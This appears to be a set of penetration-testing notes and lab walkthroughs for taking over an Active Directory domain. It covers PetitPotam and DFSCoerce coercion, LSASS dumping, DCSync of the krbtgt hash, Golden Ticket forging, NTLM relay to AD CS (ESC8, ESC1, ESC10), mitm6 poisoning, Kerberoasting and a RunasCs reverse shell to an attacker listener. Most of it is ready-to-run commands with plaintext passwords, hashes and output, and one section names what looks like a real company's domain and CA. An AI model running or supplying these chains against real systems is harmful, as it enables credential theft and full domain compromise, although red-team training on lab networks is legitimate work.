python3 PetitPotam.py -u weakuser -p Password1 -d lab.net member2022.lab.net dc2022.lab.net

Repeat PetitPotam several times to make sure tickets are present on member2022 to dump. Typical output from PetitPotam:

Trying pipe lsarpc
[-] Connecting to ncacn_np:dc2022.lab.net[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

With the Administrator hash previously dumped through the relay attack, use nxc to dump LSASS on member2022 after forcing dc2022 to connect to it with PetitPotam:

netexec smb member2022.lab.net -u Administrator -H e19ccf75ee54e06b06a5907af13cef42 --local-auth -M nanodump

The nanodump module writes a minidump to Kali as /tmp/MEMBER2022_64_MEMBER2022.log. Parse it with pypykatz and dump the Kerberos tickets with -k:
-k, --kerberos-dir KERBEROS_DIR Save kerberos tickets to a directory.

pypykatz lsa minidump /tmp/MEMBER2022_64_MEMBER2022.log -k /home/kali/Downloads/lab.net/kerberos > /dev/null

With stdout discarded, this only writes the Kerberos tickets as .kirbi files into the directory; drop the > /dev/null to also see the credentials pypykatz parses from the dump.

netexec-admin-nanodump-lsass-pypykatz-extract-kerberos-tickets.png

After executing netexec as admin with hash as authentication, the nanodump module produced output of lsass,that we parsed with pypykatz to extract the Kerberos tickets as kirbi files on Kali.

Convert kirbi to Ccache

impacket-ticketConverter converts the Kerberos ticket files from kirbi to ccache so they can be used for authentication against the domain controller from Kali.
The most valuable ticket is the DC computer account's TGT (a TGT is a ticket for the krbtgt service, hence the file name): DC2022$ holds replication rights and can DCSync.

impacket-ticketConverter 'TGT_LAB.NET_DC2022$_krbtgt_LAB.NET_fcecdbad.kirbi' krbtgt.ccache

nanodump-to-pypykatz-convert-ticket-krbtgt.png

Confirm the ticket with klist (provided by krb5-user):

sudo apt-get install krb5-user
klist -c krbtgt.ccache

export KRB5CCNAME=/home/kali/Downloads/lab.net/kerberos/krbtgt.ccache
klist

Dump KRBTGT Hash

From Kali Linux, use the DC2022$ ccache to DCSync the krbtgt hash, which gives control of the AD domain.
impacket-secretsdump performs the DCSync (DRSUAPI replication) from a Linux host. HackTheBox Academy - Attack Domain - from Linux

../secretsdump.py -k -no-pass -just-dc-user krbtgt DC2022\$@DC2022.LAB.NET

Output from secretsdump:

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a1ba41b8c05759df666c27b0822b2401:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:fc8b733eb409ce41345eebf6976329e97bcae86e4bd605c5d7d01ac3e81b1346
krbtgt:aes128-cts-hmac-sha1-96:bd36d603de4589c5b0e423257cf70a01
krbtgt:des-cbc-md5:8c315231b668dc8f
[*] Cleaning up...

Note: the krbtgt account is disabled by default and cannot be used to log on, so its hash is not validated by authenticating with it; its use is in forging tickets.

This allows crafting tickets for persistence in Active Directory.


Persistence or Lateral

Active Directory Ticket Exploit Techniques:

  • Golden Ticket: with the krbtgt key (held only by domain controllers) the attacker forges TGTs for any user in the domain, including non-existent ones
  • Silver Ticket: with a service or computer account's key the attacker forges service tickets (TGS) for that one service, never touching the DC
  • Diamond Ticket: a legitimately requested TGT is decrypted with the krbtgt key, its PAC is modified (for example extra group SIDs) and it is re-encrypted, so it looks like a DC-issued ticket
  • Pass-the-Ticket (PtT): no forging; a legitimate ticket stolen from memory (or collected through unconstrained delegation after a coercion) is reused from another host
  • Kerberoasting: request service tickets for accounts with a Service Principal Name (SPN) and crack the service account password offline
  • AS-REP Roasting: accounts with "Do not require Kerberos pre-authentication" return an AS-REP encrypted with their password key, which is cracked offline
  • Delegation Abuse: a compromised account or computer with (unconstrained, constrained or resource-based) delegation rights is used to impersonate other users against the delegated services
  • Trust Ticket Attacks: forge inter-realm tickets with a trust key to pivot between Active Directory forests or domains that trust each other

Defensive note: once the krbtgt hash is out, the krbtgt password must be reset twice (waiting for replication in between, because the previous key is still accepted) to invalidate the forged tickets and break this persistence.

With the krbtgt NT hash (or AES key) from secretsdump.py, craft a Golden Ticket for an arbitrary user with Domain Admins membership (-groups 512, the Domain Admins RID) and use it to escalate privileges. The domain SID is needed first:

/usr/bin/impacket-lookupsid -k -no-pass DC2022\$@DC2022.lab.net

Output the Domain SID: S-1-5-21-1153563262-525900357-1151977077
Crafting:

python3 ../ticketer.py -nthash a1ba41b8c05759df666c27b0822b2401 -domain-sid S-1-5-21-1153563262-525900357-1151977077 -domain lab.net -groups 512 hackerx

python3 ../ticketer.py -aesKey fc8b733eb409ce41345eebf6976329e97bcae86e4bd605c5d7d01ac3e81b1346 -domain-sid S-1-5-21-1153563262-525900357-1151977077 -domain lab.net -groups 512 hackerp

python3 ../ticketer.py -nthash a1ba41b8c05759df666c27b0822b2401 -domain-sid S-1-5-21-1153563262-525900357-1151977077 -domain lab.net -groups 512 hacker2
export KRB5CCNAME=hacker2.ccache
klist

impacket-psexec lab.net/hacker2@dc2022.lab.net -k -no-pass -target-ip dc2022.lab.net

Testing persistence with the second forged ticket:

export KRB5CCNAME=/home/kali/Downloads/lab.net/kerberos/hackerp.ccache
impacket-psexec lab.net/hackerp@dc2022.lab.net -k -no-pass -target-ip dc2022.lab.net

ESC8 NTLM Relay to AD CS

ESC8 from the Certified Pre-Owned paper: NTLM relay to the AD CS HTTP enrollment endpoints.

Domain Controller --> NTLM Authentication --> NTLMRELAYX --> RELAY Request --> ADCS Web Enrollment Site

The Certificate Authority in this lab is a single member server of the domain lab.net:
CA22.lab.net holds the Enterprise CA and Root CA roles at the same time.

esc8_CA_type_Enterprise_online_issue_certs.PNG

Windows Server 2022 Certificate Authority Roles and Features installed:

esc8_CA_roles_features_installed.PNG

CA Configuration

  • kali attack relay [192.168.211.117]
  • dc2022.lab.net [192.168.211.133]
  • CA22.lab.net [192.168.211.137]
  • Target CA
  • Distinguished name: CN=lab-CA22-CA-1,DC=lab,DC=net
  • Certificate Database file path: C:\Windows\system32\CertLog
  • ADCS Services:
    • Certification Authority
    • Certification Authority Web enrollment
    • Online Responder (OCSP)
    • Network Device Enrollment Web Service (NDES) - Service account LAB\WEBSVC
    • Certificate Enrollment Web Service
      • Target CA: CA22.lab.net\lab-CA22-CA-1
  • Type of Authentication - Windows Integrated Authentication
  • Certificate Enrollment Web Service (CES) service account: LAB\WEBSVC

IIS CertSrv Authentication:

esc8_CA_iis_authentication_kernel_mode_enabled.PNG

Log in from Kali to validate that the AD CS web enrollment site loads after entering LAB\auser and the password P@ssw0rd:

esc8_CA_iis_certsrv_web_site_enroll.PNG

Update the Domain Controllers Default Group Policy (GPO): Public Key Policies - Certificate Services Client - Auto-Enrollment

esc8_CA_GPO_domain_controllers_PKI_auto_enroll.PNG

Check CA for NTLM

Running curl -I http://CA22.lab.net/certsrv/certfnsh.asp output below:

HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 12 Aug 2025 18:46:55 GMT

The WWW-Authenticate: NTLM header shows the endpoint accepts NTLM, and it is served over plain HTTP, so there is no TLS channel binding: a relayed NTLM authentication will be accepted (ESC8). On HTTPS the same header only matters if Extended Protection for Authentication is off.
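As an added example (not part of the original page), this Python turns the curl -I check above into a repeatable test: it parses the 401 response for WWW-Authenticate schemes and decides whether the enrollment endpoint is relayable, using the page's own response as constructed offline input. probe() performs the same check live against a host you supply (it is not exercised offline); the lab CA's certificate is assumed to be self-signed, so the HTTPS path disables verification.

```python
import http.client
import ssl

# Constructed copy of the curl -I output shown above, so the parser can be exercised offline.
CURL_OUTPUT = """HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 12 Aug 2025 18:46:55 GMT
"""

def parse_curl_output(text: str):
    """Return (status_code, [(header, value), ...]) from `curl -I` style output; duplicate headers are kept."""
    lines = [l for l in text.strip().splitlines() if l.strip()]
    status = int(lines[0].split()[1])
    headers = [tuple(part.strip() for part in l.split(":", 1)) for l in lines[1:] if ":" in l]
    return status, headers

def auth_schemes(headers) -> set:
    """Scheme names from every WWW-Authenticate header (NTLM, Negotiate, Basic, ...)."""
    return {value.split()[0] for name, value in headers if name.lower() == "www-authenticate"}

def esc8_exposure(status: int, scheme: str, schemes: set) -> str:
    if status != 401:
        return f"HTTP {status}: no authentication challenge at all"
    # 'Negotiate' alone still admits NTLM inside SPNEGO unless NTLM is disabled domain-wide, but an
    # explicit 'NTLM' header is the unambiguous signal that ntlmrelayx can use.
    if "NTLM" not in schemes and "Negotiate" not in schemes:
        return "no Windows integrated auth offered: not an ESC8 target"
    if scheme == "http":
        return "NTLM over clear-text HTTP: relayable (ESC8)"
    return "NTLM over HTTPS: relayable only if Extended Protection for Authentication (EPA) is off"

def probe(host: str, path: str = "/certsrv/certfnsh.asp", scheme: str = "http", timeout: float = 5.0) -> str:
    """Live check against a real CA (not run offline); same decision logic as on the parsed curl output."""
    if scheme == "https":
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # lab CA: self-signed, only the auth headers matter here
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return esc8_exposure(resp.status, scheme, auth_schemes(resp.getheaders()))
    finally:
        conn.close()

if __name__ == "__main__":
    status, headers = parse_curl_output(CURL_OUTPUT)
    print(sorted(auth_schemes(headers)), "->", esc8_exposure(status, "http", auth_schemes(headers)))
```

Run probe("CA22.lab.net") before starting ntlmrelayx; a "Negotiate"-only answer over HTTPS is the sign that the CA owner has applied the KB5005413 mitigations (NTLM disabled on IIS and EPA required), and the relay will fail.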

CA Enumeration

Find all exploitable internal certificate authority misconfigurations:

certipy-ad find -u juanb@lab.net -stdout -vulnerable -p 'P@ssw0rd123!'

To determine whether the AD CS deployment is vulnerable to the ESC8 technique, run certipy find as a low-privilege user. If certipy errors out, first check LDAP connectivity, clock skew, DNS and that the compromised account's password has not expired:

nc -vz 192.168.211.133 389
sudo ntpdate -s dc2022.lab.net
ldapwhoami -x -H ldap://192.168.211.133 -D 'auser@lab.net' -w 'P@ssw0rd'
ldapwhoami -x -H ldap://192.168.211.133 -D 'administrator@lab.net' -w 'P@ssw0rd'
dig @192.168.211.133 dc2022.lab.net +short

certipy-ad find -u auser@lab.net -p 'P@ssw0rd' -dc-ip 192.168.211.133 -ns 192.168.211.133 -ldap-scheme ldap -enabled -vulnerable

certipy-ad find \
  -u 'auser@lab.net' -p 'P@ssw0rd' \
  -dc-ip 192.168.211.133 -dc-host dc2022.lab.net \
  -scheme ldap -ns 192.168.211.133 \
  -enabled --vulnerable -v -debug
  
certipy-ad find \
  -u 'administrator@lab.net' -p 'P@ssw0rd' \
  -dc-ip 192.168.211.133 -dc-host dc2022.lab.net \
  -scheme ldap -ns 192.168.211.133 \
  -enabled --vulnerable -v -debug

Start NTLM Relay

Start the NTLM relay on the Kali attacker in a Python virtual environment.
Recent pyOpenSSL releases removed OpenSSL.crypto.PKCS12, which the --adcs attack in impacket 0.11 uses to build the PFX, so pin compatible versions:

python3 -m venv $(pwd)/relay2old
source $(pwd)/relay2old/bin/activate      # or with the absolute path: source ~/Downloads/lab.net/ca_esc8/relay2old/bin/activate

python -m pip install --upgrade pip
python -m pip install 'impacket==0.11.0' 'pyOpenSSL==23.2.0' 'cryptography==41.0.7'
python -m pip install 'setuptools<81'

"$VIRTUAL_ENV/bin/ntlmrelayx.py" -h

mkdir -p $(pwd)/loot_adcs

sudo ntpdate -s dc2022.lab.net

"$VIRTUAL_ENV/bin/ntlmrelayx.py" -smb2support -t http://CA22.lab.net/certsrv/certfnsh.asp \
  --adcs --template DomainController \
  --lootdir $(pwd)/loot_adcs/ -debug

  • --template DomainController - request from the DomainController template, which the relayed DC machine account may enroll in and which carries the Client Authentication EKU needed for PKINIT.
  • --adcs - Instruct ntlmrelayx that the target is AD CS and to save the certificate and private key (base64 PFX) to the loot directory.

Coercing DC

Force the Domain Controller to authenticate to us with DFSCoerce.py (MS-DFSNM, which only domain controllers expose):

  • kali attack relay [192.168.211.117]
  • dc2022.lab.net [192.168.211.133]
  • CA22.lab.net [192.168.211.137]

python dfscoerce.py -u auser@lab.net -p 'P@ssw0rd' 192.168.211.117 dc2022.lab.net

Success after Using a clean venv with impacket 0.11.0 and pyOpenSSL 23.2.0.

esc8_CA_venv_ntlmrelayx_dfscoerce_dc_cert.PNG

Recap - low privilege active directory users can interact with these windows protocols:

  • MS-RPRN (Print Spooler Service)
  • MS-FSRVP (File Share Shadow Copy Service)
  • MS-EFSR (Encrypting File System Remote Protocol)
  • MS-DFSNM (Distributed File System)

Stolen Certificate

ntlmrelayx prints the DC's certificate as base64. Save it as a PFX file: paste the Base64 output into a file (nano dc2022.pfx.b64), then decode it.

The decoded file is the full PFX with private key and certificate:

base64 -d dc2022.pfx.b64 > dc2022.pfx

Authenticate as DC2022$

Run Certipy to get a TGT using the PFX:

certipy-ad auth -pfx dc2022.pfx \
  -dc-ip 192.168.211.133 -username 'DC2022$' \
  -domain 'lab.net'

certipy saves the Kerberos ticket (dc2022.ccache) in the current folder.
We now hold a valid TGT for DC2022$ and, via the PKINIT user-to-user trick, its NT hash.
Next step: use that ticket to perform DCSync.

Computer DCSYNC Attack

Point the Impacket tools at the TGT (KRB5CCNAME) and run DCSync with Kerberos authentication (-k). Either use the ccache certipy saved, or obtain a fresh TGT from the PFX with PKINITtools gettgtpkinit.py:

export KRB5CCNAME=/home/kali/Downloads/lab.net/ca_esc8/dc2022.ccache
klist

python gettgtpkinit.py -cert-pfx dc2022.pfx "lab.net/DC2022\$" "extracted_tgt_file.ccache" -dc-ip 192.168.211.133
export KRB5CCNAME=/home/kali/Downloads/lab.net/ca_esc8/extracted_tgt_file.ccache
klist

impacket-secretsdump -k -no-pass 'lab.net/DC2022$@dc2022.lab.net' -just-dc-user administrator -dc-ip 192.168.211.133
impacket-secretsdump -k -no-pass 'lab.net/DC2022$@dc2022.lab.net' -dc-ip 192.168.211.133

# -no-pass suppresses the password prompt; without it, just press ENTER at the prompt and the ccache is used

Successfully performed DCSYNC Attack.

esc8_CA_dcsync_attack_executed.PNG

After the DCSync dump of all hashes, use the domain Administrator hash to gain WinRM admin access on the DC with pass-the-hash (PtH):

evil-winrm -i 192.168.211.133 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42

User DCSYNC Attack

With an AD user that holds DCSync rights (Replicating Directory Changes and Replicating Directory Changes All on the domain object):
secretsdump from the Impacket framework exports the hashes of all domain users from the domain controller through DRSUAPI replication (DCSync).
With local admin rights instead, it connects to the domain controller remotely and exports the local account hashes from the registry (SAM/LSA) or from the NTDS.dit file:

impacket-secretsdump "administrator.htb/ethan:limpbizkit"@"dc.administrator.htb"
evil-winrm -i lab.net -u administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e"

Active Directory Certificate Service Vulnerabilities

ESC1

Check the vulnerability requirements to find possible attack paths (ESC1 needs a template that lets the enrollee supply the subject, carries a client-authentication EKU, and is enrollable by a low-privileged user):

certipy-ad find -u juanb@lab.net -stdout -vulnerable -p 'P@ssw0rd!' | grep -ie 'esc\|enabled\|template\|Certificate Authorities'

Validate the target account to request a certificate for:

certipy-ad account -u juanb@lab.net -p 'P@ssw0rd!' -user EXCH2010INST -dc-host prd-hodc02.lab.net -dns lab.net read

The output includes the objectSid (needed later for the SID extension) and the UPN.

[*] Reading attributes for 'EXCH2010INST':
    cn                                  : EXCH2010INST
    distinguishedName                   : CN=EXCH2010INST,OU=DomainAdmins,OU=Domain Security Accounts,DC=ho,DC=FosLtd,DC=co,DC=za
    name                                : EXCH2010INST
    objectSid                           : S-1-5-21-1177238915-515967899-682003330-60545
    sAMAccountName                      : EXCH2010INST
    userPrincipalName                   : EXCH2010INST@lab.net
    userAccountControl                  : 66048
    whenCreated                         : 2012-09-20T14:13:17+00:00
    whenChanged                         : 2025-08-14T17:58:30+00:00

Request a certificate with the target's UPN and, because of the KB5014754 strong-mapping changes, its SID embedded in the certificate:

certipy-ad req -u juanb@lab.net -p 'P@ssw0rd!' -dc-host prd-hodc02.lab.net -dns lab.net -target 'lab.net' -ca 'FOSCHINI Issuing CA01' -template '18-Months-WebClientandServer' -upn 'EXCH2010INST@lab.net' -sid 'S-1-5-21-1177238915-515967899-682003330-60545' 

Validate that the PFX certificate authenticates:

nxc smb prd-hodc02.lab.net --pfx-cert exch2010inst_ho.pfx -u EXCH2010INST 

ESC10

ESC10 Case 2 Requirements

Gain control over a "victim" account's UPN: the attacker needs the ability to modify the userPrincipalName (UPN) attribute of the victim account (GenericWrite or WriteProperty on that attribute).
The victim account must be able to enroll for a client-authentication certificate, and the DC's Schannel certificate mapping (CertificateMappingMethods) must allow mapping by UPN, so that a certificate is matched to whichever account carries its UPN when authenticating over LDAPS.

getTGT.py -hashes ':738eeff47da231dec805583638b8a91f' 'mirage.htb/mirage-service$'

KRB5CCNAME=mirage-service\$.ccache certipy find -vulnerable -u 'mirage-service$@mirage.htb' -k -dc-ip 10.10.11.78 -stdout -target dc01.mirage.htb
certipy find -vulnerable -u 'mark.bbond@mirage.htb' -p '1day@atime' -k -dc-ip 10.10.11.78 -stdout -target dc01.mirage.htb

Set the victim's UPN to dc01$@mirage.htb, request a certificate (its UPN now points at the machine account), reset the UPN so it no longer matches mark.bbond, and authenticate with the certificate over Schannel into an LDAP shell as the machine account. Result: ESC10 exploited.

KRB5CCNAME=mirage-service\$.ccache bloodyAD -k -d mirage.htb -H dc01.mirage.htb set object mark.bbond userPrincipalName -v 'dc01$@mirage.htb'

certipy req -u mark.bbond@mirage.htb -p '1day@atime' -k -dc-ip 10.10.11.78 -target dc01.mirage.htb -ca mirage-DC01-CA -template 'User'

cat dc01.pfx

KRB5CCNAME=mirage-service\$.ccache bloodyAD -k -d mirage.htb -H dc01.mirage.htb set object mark.bbond userPrincipalName -v 'DoNOTMatchUserSPN'

certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell

$ whoami
set_rbcd dc01$ mirage-service$

getTGT.py -hashes ':738eeff47da231dec805583638b8a91f' 'mirage.htb/mirage-service$'
KRB5CCNAME=mirage-service\$.ccache getST.py -k -no-pass -spn 'http/dc01.mirage.htb' -impersonate dc01$ 'mirage.htb/mirage-service$'

KRB5CCNAME=dc01\$@http_dc01.mirage.htb@MIRAGE.HTB.ccache secretsdump.py -no-pass -k dc01.mirage.htb -just-dc-ntlm
psexec.py -k -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 'mirage.htb/administrator@dc01.mirage.htb'
type flag.txt

This is resource-based constrained delegation: set_rbcd writes mirage-service$ into msDS-AllowedToActOnBehalfOfOtherIdentity on dc01$, so mirage-service$ can obtain service tickets to dc01 on behalf of other principals via S4U2Self + S4U2Proxy; here it impersonates dc01$ itself, whose ticket is then enough for DCSync.


Other Relay & MITM References

krbrelayx can also relay to the CA enrollment endpoint; set up the relay:

sudo ./krbrelayx.py --target http://CA22.lab.net/certsrv -ip 192.168.211.117 --victim dc2022.lab.net --adcs --template Machine

Run mitm6 to poison IPv6 DNS for the target host and relay to the CA:

sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v4

IPv6 attacks

YouTube Video: IPv6 Attack with MITM6 & NTLMRELAYX

sudo nmap -6 dc2022.lab.net

impacket-ntlmrelayx -6 -t ldaps://192.168.1.116 -wh fakewpad.lab.net -l dumped-lootinfo

sudo mitm6 -i eth1 -d lab.net

  • Security tooling focuses on IPv4, leaving IPv6 largely unmonitored
  • IPv6 is enabled and auto-configures by default on Windows (and many Linux) hosts, and Windows prefers it over IPv4
  • mitm6 answers DHCPv6 to become the DNS server, then WPAD forces clients to authenticate over IPv6
  • NTLM relay works the same over IPv6
  • IPv6 traffic may bypass IPv4-only segmentation rules


Recover Deleted User

Restore a deleted user in Active Directory from a remote Linux host when a usable credential is known. Along the way: set an SPN on a target account for targeted Kerberoasting, crack the hash offline, and log in with Kerberos using a ccache and evil-winrm.

  1. Targeted Kerberoast to gain access to the WinRM account: set a temporary SPN on svc_winrm.
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k set object svc_winrm servicePrincipalName -v 'HTTP/SkippyPeanut'
  2. Extract the kerberoast hash for the targeted account.
nxc ldap dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' --kerberoast hash.out -k
  3. Crack the WinRM account password.
hashcat -m 13100 hash.out rockyou.txt
  4. Clean up: remove the SPN again (set object with no value clears the attribute).
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k set object svc_winrm servicePrincipalName
  5. Validate access to the WinRM service (this nxc check uses NTLM; where NTLM is disabled, use the Kerberos method in the next step).
nxc winrm dc.voleur.htb -u svc_winrm -p 'AFireInsidedeOzarctica98019afi'
  6. Connect with a Kerberos ticket: getTGT.py takes the user's password (or NTLM hash) and requests a TGT usable against any service the user has access to.
getTGT.py 'voleur.htb/svc_winrm:AFireInsidedeOzarctica98019afi'
KRB5CCNAME=svc_winrm.ccache evil-winrm -i dc.voleur.htb -r voleur.htb
  7. Use RunasCs inside the WinRM session to get a reverse shell as svc_ldap.
.\runascs.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.14.8:9001
rlwrap nc -nvlp 9001
  8. Use the AD PowerShell module to find and restore the deleted user.
Get-ADObject -filter 'isDeleted -eq $true' -IncludeDeletedObjects
Get-ADObject -filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects

Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
  9. Validate the restored user's access with the password found in a spreadsheet on the share.
nxc smb dc.voleur.htb -u todd.wolfe -p 'NightT1meP1dg3on14' -k
  10. Alternative: ldapsearch can also see deleted objects when sent the Show Deleted control (OID 1.2.840.113556.1.4.417).
getTGT.py 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
KRB5CCNAME=svc_ldap.ccache ldapsearch -H ldap://dc.voleur.htb -Y GSSAPI -b "CN=Deleted Objects,DC=voleur,DC=htb" -E '!1.2.840.113556.1.4.417'
  11. Alternative: the netexec tombstone module lists and restores objects from the "Deleted Objects" container; SCHEME=ldap keeps the connection on plain LDAP because the target DC has no certificate for LDAPS.
sudo apt install python3-gssapi
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec/

git config pull.rebase true
git pull origin pull/736/head

nxc ldap dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k -M tombstone -o ACTION=query
nxc ldap dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k -M tombstone -o ACTION=restore ID=1c6b1deb-c372-4cbb-87b1-15031de169db SCHEME=ldap
  12. The restored user Todd.Wolfe is a member of the second-line technicians group. Look at the file share to discover his user backup:
nxc smb dc.voleur.htb -u todd.wolfe -p 'NightT1meP1dg3on14' -k